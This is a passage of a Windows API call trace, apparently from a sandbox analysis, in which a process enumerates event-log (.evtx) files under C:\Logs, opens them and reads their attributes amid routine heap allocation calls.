(in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.321] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.321] CloseHandle (hObject=0x428) returned 1 [0072.322] AreFileApisANSI () returned 1 [0072.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0072.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0072.322] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.322] GetFileType (hFile=0x428) returned 0x1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0072.322] CloseHandle (hObject=0x428) returned 1 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.323] AreFileApisANSI () returned 1 [0072.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0072.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0072.323] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.323] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.324] AreFileApisANSI () returned 1 [0072.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", lpUsedDefaultChar=0x0) returned 55 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.324] AreFileApisANSI () returned 1 [0072.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76278 [0072.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0072.325] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.325] GetFileType (hFile=0x428) returned 0x1 [0072.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.325] CloseHandle (hObject=0x428) returned 1 [0072.325] AreFileApisANSI () returned 1 [0072.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0072.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0072.326] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.326] GetFileType (hFile=0x428) returned 0x1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.326] CloseHandle (hObject=0x428) returned 1 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.327] AreFileApisANSI () returned 1 [0072.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0072.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0072.327] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.327] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0072.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0072.328] AreFileApisANSI () returned 1 [0072.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpUsedDefaultChar=0x0) returned 73 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.328] AreFileApisANSI () returned 1 [0072.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0072.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0072.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0072.329] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.329] GetFileType (hFile=0x428) returned 0x1 [0072.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0072.329] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.329] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.329] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.329] CloseHandle (hObject=0x428) returned 1 [0072.329] AreFileApisANSI () returned 1 [0072.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0072.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0072.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0072.330] CreateFileW 